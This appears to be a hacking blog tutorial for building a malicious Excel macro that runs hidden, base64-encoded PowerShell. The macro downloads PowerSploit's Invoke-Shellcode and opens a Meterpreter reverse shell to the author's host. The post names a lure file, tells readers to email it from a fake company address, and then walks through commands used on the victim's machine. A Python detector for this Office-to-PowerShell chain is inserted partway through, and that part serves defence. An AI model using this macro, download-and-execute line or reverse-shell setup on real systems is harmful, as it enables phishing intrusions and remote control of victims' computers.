After the previous post, I think you guys have tried some tricks with the Social Engineering Toolkit (SET). Believe me, this tool is worth trying. Today I will show you an old trick of mine related to social engineering. Sometimes, when you get into the victim's network, you can't use ARP poisoning, by which I mean web-based attacks. At that point you should try injecting a payload into a document and sending it via a fake company email. In this example I use an Excel macro. You can follow my quick tutorial to get the whole point of it.
- Firstly, open Excel and put some funny information in it, like this:
- Secondly, you create a macro named Auto_Open() like this:
    ' Auto_Open runs automatically when the workbook is opened (once macros are enabled)
    Sub Auto_Open()
        ' Reveal the second sheet so the document looks "unlocked" to the reader
        Sheets("Sheet2").Visible = True
        Sheets("Sheet2").Select
        Dim strCommand As String
        ' -Enc takes the base64-encoded script; [Base64Code] is replaced below
        strCommand = "PowerShell.exe -Exec Bypass -NoL -Win Hidden -Enc [Base64Code]"
        ' Second argument 0 (vbHide) keeps the PowerShell window from appearing
        Shell strCommand, 0
    End Sub
Do you still remember how I create a meterpreter that connects back to my host? (If you forgot, you can review it in this post.)
If you remember it, you can just base64-encode this code:
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/12ce71b9f4b0428d9425e001e5988f91eb2b8b87/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.10.138 -Lport 443 -Force
And your base64 encoding is here:
Put it in place of [Base64Code] above and your macro is finished. Then save the file under this name: Hotgirl_Telephone.xls.
You know what I mean. 😀
- Send this Excel file as a mail attachment. But it has a drawback, which you can see here:
You need to use your social engineering to get the victim to enable the macro feature.
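The macro above makes Excel launch a hidden PowerShell process whose script arrives base64-encoded, and on the defender's side that chain is one of the easiest to spot in process-creation telemetry. The following Python is an added example, not code from the original post: it assumes process-creation events flattened to "key=value|key=value" lines (a constructed stand-in for Sysmon Event ID 1 or Security 4688 records), decodes the -EncodedCommand argument (PowerShell expects base64 of the script's UTF-16LE bytes, which is also what the "base64 encode" step above has to produce for the macro to work) and scores each event on an Office parent, a hidden window, an execution-policy bypass and download-and-execute strings in the decoded script. The sample events, the placeholder URL and the field names are all constructed.

```python
import base64
import binascii
import re
from typing import Optional

# Process-creation events are modelled as "key=value" fields joined by "|":
# a constructed, flattened stand-in for Sysmon Event ID 1 / Security 4688 records.
FIELD_SEP = "|"

# Office applications should almost never spawn an interpreter; when they do,
# the document that was just opened is the first suspect.
OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}

# PowerShell accepts any unambiguous prefix of its switches; these patterns cover
# the spellings used in the post ("-Enc", "-Win Hidden", "-Exec Bypass") and the
# full names. They are deliberately not exhaustive.
ENC_RE = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|enco|encodedcommand)\s+([A-Za-z0-9+/=]+)")
HIDDEN_RE = re.compile(r"(?i)-(?:w|wi|win|windowstyle)\s+hidden")
BYPASS_RE = re.compile(r"(?i)-(?:ex|exe|exec|executionpolicy)\s+bypass")

# Substrings of a decoded script that indicate staged, in-memory code execution.
SUSPICIOUS_TOKENS = ("DownloadString", "Net.WebClient", "IEX", "Invoke-Expression",
                     "Invoke-Shellcode", "FromBase64String")


def encode_for_powershell(script: str) -> str:
    """-EncodedCommand takes base64 of the script's UTF-16LE bytes (not UTF-8).
    Used here only to build the constructed sample events below."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(blob: str) -> Optional[str]:
    """Reverse that encoding; None if the blob is not valid -EncodedCommand data."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def parse_event(line: str) -> dict:
    """Split one flattened event into a field dict (first '=' separates key and value)."""
    fields = {}
    for part in line.split(FIELD_SEP):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyse_event(line: str) -> Optional[dict]:
    """Return a finding (reasons, decoded script, score) or None if nothing stands out."""
    ev = parse_event(line)
    parent = basename(ev.get("ParentImage", ""))
    image = basename(ev.get("Image", ""))
    cmdline = ev.get("CommandLine", "")
    reasons, decoded = [], None

    if parent in OFFICE_PARENTS and image in INTERPRETERS:
        reasons.append(f"office application {parent} spawned {image}")
    if HIDDEN_RE.search(cmdline):
        reasons.append("window hidden from the user")
    if BYPASS_RE.search(cmdline):
        reasons.append("execution policy bypassed")

    m = ENC_RE.search(cmdline)
    if m:
        decoded = decode_encoded_command(m.group(1))
        if decoded is None:
            reasons.append("-EncodedCommand present but not decodable")
        else:
            reasons.append("encoded command present")
            for tok in SUSPICIOUS_TOKENS:
                if tok.lower() in decoded.lower():
                    reasons.append(f"decoded script contains {tok}")

    if not reasons:
        return None
    return {"parent": parent, "image": image, "decoded": decoded,
            "reasons": reasons, "score": len(reasons)}


def analyse_log(lines) -> list:
    """Findings for every event in a log, highest score first."""
    findings = [f for f in (analyse_event(l) for l in lines) if f]
    return sorted(findings, key=lambda f: f["score"], reverse=True)


# Constructed sample events (placeholder URL; not real infrastructure).
STAGER = "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/stager.ps1')"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    # What the post's Auto_Open macro produces: Excel launching hidden, encoded PowerShell.
    r"ParentImage=C:\Program Files\Microsoft Office\Office14\EXCEL.EXE|Image=" + PS
    + "|CommandLine=PowerShell.exe -Exec Bypass -NoL -Win Hidden -Enc " + encode_for_powershell(STAGER),
    # An administrator running a script from a console: nothing to report.
    r"ParentImage=C:\Windows\System32\cmd.exe|Image=" + PS + r"|CommandLine=powershell.exe -File C:\ops\backup.ps1",
    # Encoded but harmless once decoded: low score, worth a look but not an alert on its own.
    r"ParentImage=C:\Windows\explorer.exe|Image=" + PS + "|CommandLine=powershell.exe -Enc " + encode_for_powershell("Get-Date"),
]

if __name__ == "__main__":
    for f in analyse_log(SAMPLE_EVENTS):
        print(f"score={f['score']} {f['parent']} -> {f['image']}")
        for r in f["reasons"]:
            print("   ", r)
        if f["decoded"]:
            print("    decoded:", f["decoded"])
```

Run it as a script to see the scored findings: the Excel-parented event collects every indicator, the administrator's console run produces no finding at all, and the encoded-but-harmless event lands in between with a single reason. Decoding the argument rather than alerting on "-Enc" alone is what separates those last two cases. The switch-prefix regexes only cover the spellings in the post plus the full names, so a production rule should widen them.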
- After this part, everything is done. When we start our listener on port 443, the victim connects back to our host.
We use this command to start interacting with our session:
sessions -i 1
And show their drives:
List all the files in this drive:
Or their currently running processes:
Because I'm used to Windows command lines, I use this command to switch to a cmd shell:
execute -f cmd.exe -i -H
Then you can list their files with the dir command.
You can write a note.txt file as a test (you know what I mean here? 😉):
echo recovery sky > note.txt
Check that it appeared:
View its content:
Then delete it:
del /q /f note.txt
Finally, if you want to exit this mode, type exit.
And run this session in the background:
To select another session in your list:
Personally, I think that is enough for you guys to test the victim's computer, but always keep in mind that we do this for educational purposes. 😀